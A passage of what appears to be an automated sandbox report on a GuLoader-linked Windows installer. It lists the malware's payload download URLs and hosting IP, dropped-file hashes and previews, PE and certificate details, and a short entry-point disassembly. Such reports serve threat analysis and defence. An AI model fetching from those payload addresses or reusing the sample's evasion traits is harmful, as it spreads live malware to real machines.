                https://comercializadoradeinsumos.cl/wmKmOQ868z.exe, 00000004.00000003.3008838276.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000003.3009015750.0000000002764000.00000004.00000020.00020000.00000000.sdmp, wmKmOQ868z.exe, 00000004.00000002.3341099454.0000000002766000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://comercializadoradeinsumos.cl/LNRHXbp85.binzwmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://comercializadoradeinsumos.cl/LNRHXbp85.binOpwmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://comercializadoradeinsumos.cl/LNRHXbp85.bin_pwmKmOQ868z.exe, 00000004.00000002.3341033592.0000000002718000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                unknown
                https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214wmKmOQ868z.exe, 00000004.00000001.2652302474.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                  high
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  162.240.106.189
                  comercializadoradeinsumos.clUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1550272
                  Start date and time:2024-11-06 16:28:27 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 7m 35s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name:Run with higher sleep bypass
                  Number of analysed new started processes analysed:5
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:wmKmOQ868z.exe
                  renamed because original name is a hash value
                  Original Sample Name:f392bfa146ad86308fa464a9505708645f99618d54483cbc6b746b656f26a3fb.exe
                  Detection:MAL
                  Classification:mal88.troj.evad.winEXE@2/12@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 58%
                  • Number of executed functions: 29
                  • Number of non-executed functions: 283
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Stop behavior analysis, all processes terminated
                  • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: wmKmOQ868z.exe
                  No simulations
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  162.240.106.189rNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                    rNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      comercializadoradeinsumos.clrNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                      • 162.240.106.189
                      rNuevo_Pedido_129149.exeGet hashmaliciousGuLoaderBrowse
                      • 162.240.106.189
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      UNIFIEDLAYER-AS-1US6ehOuQ8ifL.exeGet hashmaliciousAgentTeslaBrowse
                      • 192.185.13.234
                      h0r0zx00x.spc.elfGet hashmaliciousMiraiBrowse
                      • 162.147.246.100
                      INVOICE_PO# PUO202300054520249400661.exeGet hashmaliciousFormBookBrowse
                      • 162.241.63.77
                      https://tr.apsis.one/e/BQf6Ly_NQaGdZtIyE9-tng/3lrpV7lSSP2Z5s0c5xWdEg/ln_9BtzivhtI_KJQNj5kCuaI/vcJdXtLBbK596W10niZVw8e08muc2sIkVCjdxfo2wWNAJh03ylvMgHMGet hashmaliciousUnknownBrowse
                      • 162.241.114.35
                      example.htmlGet hashmaliciousUnknownBrowse
                      • 69.49.245.172
                      Remittance_Ref;-49743170932be73dd68e9130949b1b5dbf8aa216bc0f0729cd.htmlGet hashmaliciousUnknownBrowse
                      • 69.49.245.172
                      Statement.docxGet hashmaliciousUnknownBrowse
                      • 192.185.154.245
                      wODub61gZe.exeGet hashmaliciousFormBookBrowse
                      • 162.241.169.207
                      fAzUnj6Djg.exeGet hashmaliciousHawkEye, MailPassViewBrowse
                      • 192.185.159.182
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      37f463bf4616ecd445d4a1937da06e192ULrUoVwTx.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.240.106.189
                      p7cCXP3hDz.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.240.106.189
                      Anfrage_244384.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.240.106.189
                      fIwP4c7xYt.exeGet hashmaliciousGuLoaderBrowse
                      • 162.240.106.189
                      6b94X7dMrG.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 162.240.106.189
                      0hNX6q4DZ0.exeGet hashmaliciousGuLoaderBrowse
                      • 162.240.106.189
                      3Pd480eWHA.exeGet hashmaliciousAgentTeslaBrowse
                      • 162.240.106.189
                      N2DJ1eUIE6.exeGet hashmaliciousFormBook, GuLoaderBrowse
                      • 162.240.106.189
                      SecuriteInfo.com.FileRepMalware.29777.16321.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                      • 162.240.106.189
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      C:\Users\user\AppData\Local\Temp\nsx116.tmp\System.dllqmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                        qmt875Vf1A.exeGet hashmaliciousGuLoaderBrowse
                          czffIfANiL.exeGet hashmaliciousGuLoaderBrowse
                            0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                              0GuwV0t2UU.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                  eXaiza8cQ5.exeGet hashmaliciousGuLoaderBrowse
                                    NacahSetup.exeGet hashmaliciousUnknownBrowse
                                      NacahSetup.exeGet hashmaliciousUnknownBrowse
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):12288
                                        Entropy (8bit):5.804946284177748
                                        Encrypted:false
                                        SSDEEP:192:ljHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZqE0QPi:R/Qlt7wiij/lMRv/9V4bfr
                                        MD5:192639861E3DC2DC5C08BB8F8C7260D5
                                        SHA1:58D30E460609E22FA0098BC27D928B689EF9AF78
                                        SHA-256:23D618A0293C78CE00F7C6E6DD8B8923621DA7DD1F63A070163EF4C0EC3033D6
                                        SHA-512:6E573D8B2EF6ED719E271FD0B2FD9CD451F61FC9A9459330108D6D7A65A0F64016303318CAD787AA1D5334BA670D8F1C7C13074E1BE550B4A316963ECC465CDC
                                        Malicious:false
                                        Antivirus:
                                        • Antivirus: ReversingLabs, Detection: 0%
                                        Joe Sandbox View:
                                        • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                        • Filename: qmt875Vf1A.exe, Detection: malicious, Browse
                                        • Filename: czffIfANiL.exe, Detection: malicious, Browse
                                        • Filename: 0GuwV0t2UU.exe, Detection: malicious, Browse
                                        • Filename: 0GuwV0t2UU.exe, Detection: malicious, Browse
                                        • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                        • Filename: eXaiza8cQ5.exe, Detection: malicious, Browse
                                        • Filename: NacahSetup.exe, Detection: malicious, Browse
                                        • Filename: NacahSetup.exe, Detection: malicious, Browse
                                        Reputation:moderate, very likely benign file
                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L....C.f...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):391326
                                        Entropy (8bit):1.2598991897339225
                                        Encrypted:false
                                        SSDEEP:768:GcJYS2pZ+e16MV4+KZgNQ97FkX/E+Lt97IkW3F4OvAPwmcMUoaFu4vMBUq2L0BQZ:/TmK4iiR6XUq0Qw1rfyivGfSopD6uH0y
                                        MD5:6E6832896907F1F51F42BAE57CE341BC
                                        SHA1:9294AC513B5968808BE70F6EFE2D027E7837B989
                                        SHA-256:C65E4FF0B7A80E686858F6C34B686DE908540CCDE1A3AE5E627272DFC4E40D20
                                        SHA-512:BC04F0319512812E54A7E612991A7BD71FEAE1E955DAFCAEE407C835F70D1E1F4212E4085D123A046BFBFCE2F96BF9DD80B456E308B11D0584E933FE6D456324
                                        Malicious:false
                                        Reputation:low
                                        Preview:...............c.....y....R.............T....b..T......................................k...:...........................+.............................5........................................<...................................................(........2.....I..........:......................................................{........b...o...........................q...W...................m...........................Q...................................,......-......................c....................................]........a........................................................................=....(.......................6.=......................................=......................C...................C.....................K...................................................................................I..........................N...........................Y.......................................l.............c..................V.................L......................i..........
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):258798
                                        Entropy (8bit):1.2490334020377054
                                        Encrypted:false
                                        SSDEEP:768:T2PLd1hgU1SmVlqVwusTqMdrtd5jsctJuIsiIZtRlAf9tpjc9GI+DFENhHiXP7yj:ad1euLPsb39GIqFruRChk
                                        MD5:3269394F73B2ADA0574A74284D8B2E17
                                        SHA1:8CC597FD67D71D56F489C2B970682D9DED1392FC
                                        SHA-256:510850D30CEC95EB1A0BF4FCA7B7F0113F0D4C42726B794EFA98937AF62A516B
                                        SHA-512:A4BFAA7C52CF5EE5E9CDB900A3228A17109BFE46B08266DAE3057F17A6EAAAAB5DFD91DBB4833FA47FC961B5809FB41C340BCF82139ACD7A4B9AB54DF94351D8
                                        Malicious:false
                                        Reputation:low
                                        Preview:..........`................0...........................................................k.......................p.............................. .................................(...................................J...................... .|......J..........H......A...............................................x..........w....................................J.................................................,.....M.[.............................................................l...................C....................................................o................9............................!......P...1..L..................d..7..........................................B.....8................................................................$.................................................... ..........................................'.F...............................................................................@..........................................V....sJ.0......Y.....c....|....
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):323693
                                        Entropy (8bit):1.2536949862219147
                                        Encrypted:false
                                        SSDEEP:1536:FCN4UE4Tjyohd/qCWOGtHCIFy58RqmA3I:FCN4GiVCuyuw3I
                                        MD5:AEE2F83A7C4C7F24701B741521FB2E16
                                        SHA1:A8FEFDB29A731112A30BB5E2B3EF87B89A6D0F3E
                                        SHA-256:CAEBFE32548B8DC684AA35B144A20A99FA6F36692BED690DE4900691A525DA30
                                        SHA-512:075E80AC88843441E4B3A24D525DD1043AAEFCA9EBCB8C445E442C3B4F421C955A2A5A93D9E37327BB50228B81F2036C0D9842CFED7D186A05DABD5C211C3879
                                        Malicious:false
                                        Reputation:low
                                        Preview:..........^.......r..........................'.......................F.........................5...................&.Z..........p.......}......................................................................................................E...................................6... ............`.......................:.....................................................................J.......................................B............................................p..........n...........6.......................Z............................B.B...............[.....................................a@..............j.....................(.....-...R............................{.............................................Y.h................L..................................._............h....<.......................................l............................................~..............n................n......G............................................................................
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):218367
                                        Entropy (8bit):1.246980092990912
                                        Encrypted:false
                                        SSDEEP:768:5c8SYAdyufvUy3CuNMJAdaM+KCzP6QcG9wghZ0cL52j/i10qEDYiaXF44Xrrocc1:5hAdayyxFVZ64Xve5rsW4
                                        MD5:9EC9F165C9E1D40A5FE69E13F4E40BB2
                                        SHA1:4F35529EB907F3DD41D2F1C1F8114896B0049FEF
                                        SHA-256:3C494D3A6F8E831560EDCAF571F1AED0DB2699D951DCE31555FFC8EEB0C68E8E
                                        SHA-512:1F8BC071520584402BE5692375F40AF319914777AD3CF7CAF4291D4281E4FF3EB18FEE781F22C84F4336B8E403A21D59D8F4EECF17009DA34D7DA9B6B6EDA14F
                                        Malicious:false
                                        Reputation:low
                                        Preview:..............s..............:..........8......D...............n....1..g.................9.................................(....................................................a...........................................................................S.........................................................................................................................I.........................................................................S..3........7u.s.............................[.....................5.\....................................................y.............~........R..........a...................i..............................t.......................................................................................................................................................................................................................................................$.......|.....y....................................0P...............q..........................
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):465079
                                        Entropy (8bit):1.2524740649146269
                                        Encrypted:false
                                        SSDEEP:1536:Rv7GJmqRTpKBSpacoAbleU7c0PReL6HSE1/hqQ79/:RzG5n7DRe+jqQ
                                        MD5:E2123D8FCF95DD997B5B57C859952C42
                                        SHA1:C57FA1122078B47A37E0D2FADD0ABC4C2B8B6185
                                        SHA-256:7D67F05679B2132F418A353DC26498F79E93133C482B28D20EE18C3A83534B3E
                                        SHA-512:1A5339D733B08A760BE0D69162422A3A9199AC496D970A57050C3C009FE9EF47095CE2F4D14E6F96F7CB5E870E1CAF8EAFE2AF4660FCEC2AADEAD2884F27A27D
                                        Malicious:false
                                        Preview:................................ ..................0..2............c....................z..../.............~...........W...........z...........~...............................P.............>...............................#..........R.......U.....3.........................................<....Y........$......................................U.............]s............................^.......................................................................7..................w...`...........................k...........................@.......c....................................k...........................y......Y................................................X..................................e....J......................?..r................!..0....................P...................%...........e..........7........v............................................a...........$...........................9........./...........................................................................M....
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):442049
                                        Entropy (8bit):1.2574037958564046
                                        Encrypted:false
                                        SSDEEP:1536:9U42WMwaAJbj1SWgmYjFLw5pUEx6Yszh92PbGwT/:9UM9ffpcFLwYuHszj2Pbf
                                        MD5:436F0693F85A9463E53FC25016A6E62E
                                        SHA1:70920FF51C4E0CAA612419FFB860FDDC24F0B7C5
                                        SHA-256:F4190EE3362CE3585A4A921077C1AD14E895C80AD7D17455B55AAC27335E2093
                                        SHA-512:CEC32BAF315AE9D3480D221E54503898E2EB31C5FD0B81A87852AD6EA566BA8584B0CA02D3E898C5CBB078F60B20EFA490F6B2D8D4F1ED22169C8DF2DC7BB392
                                        Malicious:false
                                        Preview:...............................................0....#..._...........................................................fs.....D.......v.................................^...................r....%.............O....;.........aH................1...................................\..............z.............................................................W.............m...............................................t..................-......................$........a...........................M.........`m..........o.....9.....I...............................................m@..............................1.........................................................................................>."............e...F.........F..*...............*.v...................................|............................................................................>................e................................................................................................................p...........
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):114943
                                        Entropy (8bit):4.604452274718302
                                        Encrypted:false
                                        SSDEEP:1536:CjeuMY6H5nEUWetVSG8/02hpWLHR5SqiNO5m2Ki7ohIyPUo35tlk5RKt:EeuMY6H9EUWr3h0jPSTN4m2eIycQtl1t
                                        MD5:F898FE59DC4DDFDF62192FEEE8E15230
                                        SHA1:452F53CD2BE9F599740371EF73EE6439DC562B91
                                        SHA-256:D5E2E2DC7571A812B08AC556C175F23BDB83ABDF0160A4101B0670E834E93DD9
                                        SHA-512:247CC61BDEF0731F093EF5D3A1EFB8C057A87CA5524A3750D2B7663662F989CD40551421973BF2FC98882317E43235A61A053D90E94F6E6F556F81201A9CEEA7
                                        Malicious:false
                                        Preview:.&&..........EEE.....u....................oo.....................................a..... .........!.....SSSS..c.........*..m.......................pp.....qqq...c.......................6........i.......x.......U.........h...................cc..O............{...........................BB...X.............((....ff.................a....!.....}...```.......N............J......i...66.....................i.............y...................||||||............7...ddd..//............++.............................v..........................q..........................xx...>.e..........O........XX.]].k.555..................3.s.........WW....GG............................................. ............DDDD.???..........................f.........]......&&&............L......:..........'.(....33...!...=.....nnnnnnn..........{{....e.RRR.............%%.....CC...+...................%.`......::::.................................................66..\..............ooo.66.^^^........eee..................NN....
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):246772
                                        Entropy (8bit):1.2570033577927036
                                        Encrypted:false
                                        SSDEEP:768:jF+X5GwMbRR6v/H4EwYatl23bka4FtbP30qIlbXc/B/VDYFgHUAHFLO3+u1uNnEA:jFROqkCEr2/Vd0WP9Ph0nVc
                                        MD5:51B771910E4858E4E5CDD09DF62F5BB8
                                        SHA1:8F52AC9FB80E1F75FB4C20112D83E41F6B51B9A5
                                        SHA-256:673C982F75C3CDD0EACAD35785FB01475D01964806072C2DE8E4B011C8EF4DB7
                                        SHA-512:ADE1E430583B64F3A8EE77931B24CD4C179A44CF5C88CA46444F41616812D524660274F426D5AB7EC62E0277B58EB5E13F737ABDFDCA83DB55853EAD4CA78E5F
                                        Malicious:false
                                        Preview:...............f......................-......................y.............R...............}.........~................................................................(................g...........................2...........................................................................................u...................W..............Z......_....................................m..........................................H........s.......................................Q........K..................................................b.....k...................................w....i.................................................t.........................................................................=.........................................................R.........[.....................................................\.....................3...........Z............................................................k.....................................H.....................q.......!.........
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):379
                                        Entropy (8bit):4.329981128856023
                                        Encrypted:false
                                        SSDEEP:6:9xjkVqlVDbW189uc6q9KReE9cypokkFqpiL3XP2MkdmFiFNSdqkDrD60s++JuGgz:LxPDbWA9weQcyF+n+Mwm8FYFDKpJbJf0
                                        MD5:F6E659DE27C7920DA8122DCD7C1EBBFD
                                        SHA1:FF974B124B5C7F75694B9821FCF43A71E80FF8FD
                                        SHA-256:4014208ED19D8A82A79EF53A86178D0B3AAF527A872BBC34D4D55476BA52C66A
                                        SHA-512:77B7C164E8A422B7DB2B3FF9978689A2A67DF34F84DE2FBE25EF3517259908682DE46C59264A4C3CDDD5DBDE16EE37232678097EFEE26FADBA351332200CA010
                                        Malicious:false
                                        Preview:klodsmajorens frugtavlerens upboiling.topartisystemerne eyelash sartorii weightlifting.falcks zebeck commissionership orobanchaceous vilifies chokstarter,sammentrngningers crayoned physicomental aabenbare omnivident syrian cowbirds satsvis..ballastic citrul somatoplastic hypotekforeningernes lambert enevldiges formularlngderne.skarrehvlenes paratrichosis landwire alvorstalers,
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):260866
                                        Entropy (8bit):7.7810408287486545
                                        Encrypted:false
                                        SSDEEP:6144:emZh1GBXSLO4Y3KnpFpsIUJzoEnBv5IEsv4vx3ayWFsGjozm:VZh1GBXS4CpsLzoElK7tVsB6
                                        MD5:7E324CB2571C4B71D2D7F4B95F97E5EB
                                        SHA1:7A9B0EDA45524123305D173849B9E71EC82928F9
                                        SHA-256:43FE2F78EC9116D38BBCBBBFF3BF77C6FB78EE97D3A875C13E8314D815E4F04D
                                        SHA-512:37F1E5FF7F22264939197B28F907088CC63C8853675412EBA901E13D11B261EF070F8FB9DF4E2FD5B50053EDE453F850750A2B2DCE09D06AE2D772FA1CFC0493
                                        Malicious:false
                                        Preview:........B..l.....JJJJ..z.....eee...........................................#.r.......k....''.............................++.....................................*.......--........................@@@.QQQQQ.......EEE..........MM.......5......\\\\.......55.ooo.......b..............||..E......aa....W.......................................QQ....@@....c.........oooooo....S.A.W..z.W...fffff.............(((.............::.......''''..........0.........LLL.ee.r.....88..[.......yy.......((..4.....7.N...........RRRRR..............._........).ff.......1..v..........5...i.F...............@@@@@..ZZ..C......>.................H.'.H.MM.......P..D...........88.............@.DD.........%%..................,,,,............\\\...........................................#####.^^^^^.bb.....FF...ff......{.....J..........NNNNNNNNN..........g.....1................o.....g..2..........................eeeeee.....K. ................\.........&&..............zz.VVV....H.....[[[....................|||.[.............__
                                        Process:C:\Users\user\Desktop\wmKmOQ868z.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):33
                                        Entropy (8bit):3.9653141049815805
                                        Encrypted:false
                                        SSDEEP:3:KmIAWRY2Wd3:MzRUp
                                        MD5:76D9175A3DB7407EB0BFC3C07DDCD9D2
                                        SHA1:72071127E9A44935CB02650ED715CCAF6A8F8418
                                        SHA-256:1F7119996DD17AF05BF05E497104715BBBC3909676AFA4329FBD59502BE1A1A5
                                        SHA-512:5032DAB71E70A4BD1DAD2F5CF9380E0097BE7993BC46886FED6E4BDD8781F2B10D31338D90D0DC5804665BDA2CBFE93F1172250E1A8AB7C9118BAF9F156E3C69
                                        Malicious:false
                                        Preview:[enspirit]..rbestof=Kursusforms..
                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.8318123719824815
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:wmKmOQ868z.exe
                                        File size:830'120 bytes
                                        MD5:f7fc33c3bcded454047a6bfaf99f1452
                                        SHA1:a23a2448f373a4319fc0722b72595815d27c62c6
                                        SHA256:f392bfa146ad86308fa464a9505708645f99618d54483cbc6b746b656f26a3fb
                                        SHA512:0211b32321c50653fbf67190cd24455d997016f7cc9fe7e86457dfeda647ba326c2e0c2fa5d352a98ef4ec82724cd7ab50dc9988cb7e354f99623e0aa6740d29
                                        SSDEEP:24576:pG+yftcZ0DbBTVsVQ7LE8oy9jRKta3uja581Cj:wPcZ0BuO7L7o/a5
                                        TLSH:E10523016271D027DEDE4B71ADACDA6B2A73EE60242429570321FF0F74B3651AE3DB12
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....
                                        Icon Hash:06860fcf871b1f07
                                        Entrypoint:0x40352f
                                        Entrypoint Section:.text
                                        Digitally signed:true
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f4639a0b3116c2cfc71144b88a929cfd
                                        Signature Valid:false
                                        Signature Issuer:CN=Ijnefaldendes, O=Ijnefaldendes, L=Plattling, C=DE
                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                        Error Number:-2146762487
                                        Not Before, Not After
                                        • 20/12/2023 07:34:51 19/12/2026 07:34:51
                                        Subject Chain
                                        • CN=Ijnefaldendes, O=Ijnefaldendes, L=Plattling, C=DE
                                        Version:3
                                        Thumbprint MD5:1266A4E5109D5A1889D2D2A7D78407FE
                                        Thumbprint SHA-1:851DC2D8BEADB66C88A4E9B121F92223CFE7493A
                                        Thumbprint SHA-256:066CC1D4AFB9184750F932F7CEE5F62AC7E9F937BBC9460EAAF85A85505F286B
                                        Serial:43AC3D0F33ACF826F149C61FD35FA0AAD52C438F
                                        Instruction
                                        sub esp, 000003F8h
                                        push ebp
                                        push esi
                                        push edi
                                        push 00000020h
                                        pop edi
                                        xor ebp, ebp
                                        push 00008001h
                                        mov dword ptr [esp+20h], ebp
                                        mov dword ptr [esp+18h], 0040A2D8h
                                        mov dword ptr [esp+14h], ebp
                                        call dword ptr [004080A4h]
                                        mov esi, dword ptr [004080A8h]
                                        lea eax, dword ptr [esp+34h]
                                        push eax
                                        mov dword ptr [esp+4Ch], ebp
                                        mov dword ptr [esp+0000014Ch], ebp
                                        mov dword ptr [esp+00000150h], ebp
                                        mov dword ptr [esp+38h], 0000011Ch
                                        call esi
                                        test eax, eax
                                        jne 00007FC2F8DA240Ah
                                        lea eax, dword ptr [esp+34h]
                                        mov dword ptr [esp+34h], 00000114h
                                        push eax
                                        call esi
                                        mov ax, word ptr [esp+48h]
                                        mov ecx, dword ptr [esp+62h]
                                        sub ax, 00000053h
                                        add ecx, FFFFFFD0h
                                        neg ax
                                        sbb eax, eax
                                        mov byte ptr [esp+0000014Eh], 00000004h
                                        not eax
                                        and eax, ecx
                                        mov word ptr [esp+00000148h], ax
                                        cmp dword ptr [esp+38h], 0Ah
                                        jnc 00007FC2F8DA23D8h
                                        and word ptr [esp+42h], 0000h
                                        mov eax, dword ptr [esp+40h]
                                        movzx ecx, byte ptr [esp+3Ch]
                                        mov dword ptr [007A8318h], eax
                                        xor eax, eax
                                        mov ah, byte ptr [esp+38h]
                                        movzx eax, ax
                                        or eax, ecx
                                        xor ecx, ecx
                                        mov ch, byte ptr [esp+00000148h]
                                        movzx ecx, cx
                                        shl eax, 10h
                                        or eax, ecx
                                        movzx ecx, byte ptr [esp+0000004Eh]
                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3f60000x10078.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xc87b80x22f0.data
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x66d10x68001cb1571d2754df0a2b7df66b1b8d9089False0.6727388822115384data6.4708065613184305IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x39e3780x60092e7d2d711bd61815cb4cc2d30d795b1unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x3a90000x4d0000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0x3f60000x100780x102002f803b37b807a2b1d5cbde829bcf3ad9False0.38117732558139533data3.911000282332835IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_BITMAP0x3f64600x368Device independent bitmap graphic, 96 x 16 x 4, image size 768EnglishUnited States0.23623853211009174
                                        RT_ICON0x3f67c80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.3824988190836089
                                        RT_ICON0x3fa9f00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 12800EnglishUnited States0.32118380062305296
                                        RT_ICON0x3fdc180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4403526970954357
                                        RT_ICON0x4001c00x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 7296EnglishUnited States0.3501908396946565
